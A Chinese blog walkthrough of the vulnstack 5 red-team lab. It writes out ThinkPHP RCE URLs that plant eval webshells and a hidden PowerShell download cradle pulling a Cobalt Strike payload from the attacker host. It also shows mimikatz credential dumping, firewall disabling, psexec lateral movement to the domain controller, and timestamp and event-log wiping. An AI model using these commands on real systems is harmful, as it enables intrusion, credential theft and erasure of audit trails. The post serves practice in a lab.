vulnstack(五)-红日靶场复现

说明:关于该复现中的问题欢迎vx交流:Bestboysendit

目录
一、靶场信息:
二、外网渗透:
方式一:
方式二:
三、内网进攻:
四、痕迹清理:
五、参考链接:

一、靶场信息:
http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法。
描述
虚拟机密码
win7
sun\heart 123.com
win7内域用户登录
Administrator
dc123.com

进入系统密码
123.com

2008
sun\admin 2020.com
进入系统密码:
2020.com

Win7双网卡模拟内外网
win7需要进C盘目录给phpstudy发送快捷方式到桌面后开启;

一、环境搭建
1.环境搭建测试
2.信息收集
二、漏洞利用
3.漏洞搜索与利用
4.漏洞利用Getshell
5.系统信息收集
6.主机密码收集
7.内网–继续信息收集
8.内网攻击姿势–MS14-058
9.内网攻击姿势–MS17-010
10.psexec远控
11.内网其它主机端口
12.netsh增删防火墙规则
13.内网其它主机端口-代理转发
14.域渗透-域成员信息收集
15.域渗透-基础服务弱口令探测及深度利用之powershell
16.域渗透-横向移动[wmi利用]
17.域渗透-域控实现与利用
18、日志清理

二、外网渗透:
方式一:
1、nmap开扫:
经排查,192.168.135.150为目标地址:,开着80端口和3306

Nmap scan report for 192.168.135.150
Host is up (0.0037s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.56 seconds

2、访问80:
tp5.0版本
在这里插入图片描述

3 先上tp扫描:
下载位置:
https://github.com/tangxiaofeng7/TPScan/releases/tag/V1.1
在这里插入图片描述

4.报错查看具体版本:
在这里插入图片描述

百度具体漏洞信息。
5.利用给出的poc:
在这里插入图片描述 查数据库名

在这里插入图片描述

http://192.168.135.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd

在这里插入图片描述

6、写shell:
先尝试:

http://192.168.135.150/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20phpinfo();?^%3E%3Etest.php

可以写入:
在这里插入图片描述

http://192.168.135.150/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"]);?^>>shell.php

连不上去,。,,查看已经写入了
在这里插入图片描述

换点内容:

http://192.168.135.150/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_POST[%27c%27]);?^%3E%3Eeye.php

上来了
在这里插入图片描述

方式二:
目录扫描中得到的add.php是已经有的大马,需要密码:

dirsearch -u http://192.168.135.150


Target: http://192.168.135.150/

[12:45:58] Starting:
[12:45:58] 403 -  210B  - /%ff
[12:46:07] 403 -  220B  - /.ht_wsr.txt
[12:46:07] 403 -  223B  - /.htaccess.bak1
[12:46:07] 403 -  223B  - /.htaccess.orig
[12:46:07] 403 -  225B  - /.htaccess.sample
[12:46:07] 403 -  223B  - /.htaccess.save
[12:46:07] 403 -  224B  - /.htaccess_extra
[12:46:07] 403 -  223B  - /.htaccess_orig
[12:46:07] 403 -  221B  - /.htaccess_sc
[12:46:07] 403 -  221B  - /.htaccessBAK
[12:46:07] 403 -  221B  - /.htaccessOLD
[12:46:07] 403 -  222B  - /.htaccessOLD2
[12:46:07] 403 -  214B  - /.html
[12:46:07] 403 -  213B  - /.htm
[12:46:07] 403 -  223B  - /.htpasswd_test
[12:46:07] 403 -  220B  - /.httr-oauth
[12:46:07] 403 -  219B  - /.htpasswds
[12:46:19] 200 -  931B  - /0
[12:46:33] 403 -  225B  - /Trace.axd::$DATA
[12:46:43] 200 -    2KB - /add.php
[12:47:41] 200 -    1KB - /favicon.ico
[12:47:50] 200 -  931B  - /index
[12:47:50] 200 -  931B  - /index.php
[12:47:50] 200 -  931B  - /index.html
[12:47:50] 200 -   88KB - /index2.php
[12:48:26] 200 -   24B  - /robots.txt
[12:48:30] 200 -    0B  - /shell.php
[12:48:35] 301 -  238B  - /static  ->  http://192.168.135.150/static/
[12:48:36] 301 -  240B  - /static..  ->  http://192.168.135.150/static../
[12:48:40] 200 -   88KB - /test.php

Task Completed

用常用密码尝试。是admins
在这里插入图片描述

或者用tp的读取源码poc,我这没读到,参考:

https://blog.csdn.net/qq_32393893/article/details/109674517
http://192.168.135.150//thinkphp/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=type%20add.php

在这里插入图片描述

登陆上来:啊这就简单好多,传——>连就OK
在这里插入图片描述

三、内网进攻:
1、信息收集:
在这里插入图片描述

2、有一个别的网段,内网。。
在这里插入图片描述

3、arp 扫描地址:内网有一台192.168.138.138的机器:
在这里插入图片描述

4、查看域环境:
在这里插入图片描述

5、找域主机:
在这里插入图片描述

6、看域用户:失败
在这里插入图片描述

7、上CS神器:
先开启服务,密码123:
./teamserver 192.168.135.128 123

在这里插入图片描述

开启客户端并连接
新建监听:
在这里插入图片描述

生成web delivery
在这里插入图片描述

执行生成的命令:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.135.128:80/a'))"

在这里插入图片描述

或者生成后门后传上去执行
在这里插入图片描述

ok,拿到会话:
在这里插入图片描述

顺手提权:
在这里插入图片描述

提权成功,已经有了system
在这里插入图片描述

8、获取密码:
方法一:
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords” exit

在这里插入图片描述

方法二:使用 hashdump 和 logonpasswords 读内存和注册表密码,在 Credentials 模块下查看

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

9、找域控制器(前面找过了,,,这里学习下CS用法)
在这里插入图片描述

试一下DC可以出内网不:
在这里插入图片描述

不行

在这里插入图片描述

10、让DC上线:
方法一:
利用前面已经得到的密码——凭证传递:
在这里插入图片描述在这里插入图片描述

这种方式因为不出网行不通,,

方法二:
因为域控是不与外网进行接触的,所以要先在已经上线的主机上建立一个监听:
在这里插入图片描述

然后生成一个Executable(S)木马,上传到win7上

在这里插入图片描述
在这里插入图片描述

上传到win7
因为自带的psexec只可以在目标可以访问外网的情况下使用所以这我们还要自己上传一个psexec.exe
在这里插入图片描述

因为win7的防火墙缘故,4444端口是进不去的可以
关闭防火墙:NetSh Advfirewall set allprofiles state off
或者添加规则来放行4444端口

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=4444

在这里插入图片描述

这里小小的在靶机看下效果:
在这里插入图片描述

最后使用上传的psexec加上抓取的明文密码配合exe成功上线域控。

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p dc123.com -d -c C:\phpStudy\PHPTutorial\WWW\public\nw.exe

在这里插入图片描述

11、解决:
使用ipc 上 传 后 门 到 D C 然 后 g e t s h e l l 吧 建 立 I P C 上传后门到DC然后getshell吧 建立IPC DCgetshellIPC连接

shell net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator

在这里插入图片描述

shell net use

在这里插入图片描述

上传后门文件,查看DC服务器的时间,设置计划任务

shell copy C:\phpStudy\PHPTutorial\WWW\public\nw.exe \\192.168.138.138\c$

在这里插入图片描述在这里插入图片描述在这里插入图片描述

上线,上线时间可能会比设定时间稍微慢一点

在这里插入图片描述

在这里插入图片描述

下面两个方法就不尝试了……睡!!!

方法三:
https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw
方法四:
https://mp.weixin.qq.com/s/Ue89ZO01uoztfO4jVAvmCw

四、痕迹清理:
1、修改文件时间戳:
这里上传的文件比较多,时间差别比较大,
在这里插入图片描述

随便改一个文件的时间:

Function edit_time($path){$date1 =Get-ChildItem | 
Select LastWriteTime|Get-Random;$date2 =Get-ChildItem |
Select LastWriteTime|Get-Random;$date3 =Get-ChildItem |
Select LastWriteTime|Get-Random;$(Get-Item $path).lastaccesstime=$date1.LastWriteTime;
$(Get-Item $path).creationtime=$date2.LastWriteTime ;
$(Get-Item $path).lastwritetime=$date3.LastWriteTime};
edit_time("C:\phpStudy\PHPTutorial\WWW\public\nw.exe")

2、删除日志:
当我们做了一些操作都会记录到时间查看器里,而下面的 Powershell 就可清除相关日志:

PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"
Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}

在这里插入图片描述

有远程桌面权限时手动删除日志:
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志

wevtutil:
wevtutil el             列出系统中所有日志名称
wevtutil cl system      清理系统日志
wevtutil cl application 清理应用程序日志
wevtutil cl security    清理安全日志

在这里插入图片描述

meterperter自带清除日志功能:
clearev 清除windows中的应用程序日志、系统日志、安全日志
清除recent:
在文件资源管理器中点击“查看”->“选项”->在常规->隐私中点击”清除”按钮
或直接打开C:\Users\Administrator\Recent并删除所有内容
或在命令行中输入del /f /s /q “%userprofile%\Recent*.*

因为干啥都要登录,,,权限设置的太死,熬不住了天亮了,以后再探索……
在这里插入图片描述

五、参考链接:
thinkphp5.0.22漏洞:
https://www.cnblogs.com/st404/p/10245844.html
靶场打法:
https://www.liuyixiang.com/post/115882.html
https://www.freebuf.com/column/231458.html
https://blog.csdn.net/qq_32393893/article/details/109674517
psexec的用法
[https://blog.csdn.net/jamesdodo/article/details/81743224]

  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Goby队版POC是一个专门为队渗透测试设计的工具。队渗透测试是指模拟攻击者的技术和策略来评估组织的网络安全防御能力,并识别潜在的漏洞和弱点。Goby队版POC通过发、测试和利用网络系统和应用程序中的漏洞,帮助安全团队更好地保护组织的网络。 Goby队版POC的主要功能包括漏洞扫描、漏洞检测和漏洞利用。它可以扫描网络目标,查找可能存在的漏洞,并生成详细的报告。与传统的漏洞扫描工具不同,Goby队版POC还具备漏洞检测的能力,可以通过发送特定的网络数据包来检测目标系统的漏洞。同时,它还提供了漏洞利用的功能,可以自动化地利用漏洞攻击目标系统,以验证漏洞的存在性,并帮助安全团队修补这些漏洞。 Goby队版POC还具备一个直观的用户界面,使安全团队能够方便地管理和执行渗透测试任务。它提供了多种方式来配置和管理扫描任务,包括选择扫描目标、设置扫描选项、编写自定义POC等。同时,它还支持生成漏洞报告,以便安全团队更好地识别和修补漏洞。 总之,Goby队版POC是一款功能强大的队渗透测试工具,能够帮助安全团队发和利用网络系统和应用程序中的漏洞,提高组织的网络安全防御能力。它的直观用户界面和丰富的功能使得安全团队能够更加高效地管理和执行渗透测试任务,并根据测试结果采取相应的修补措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值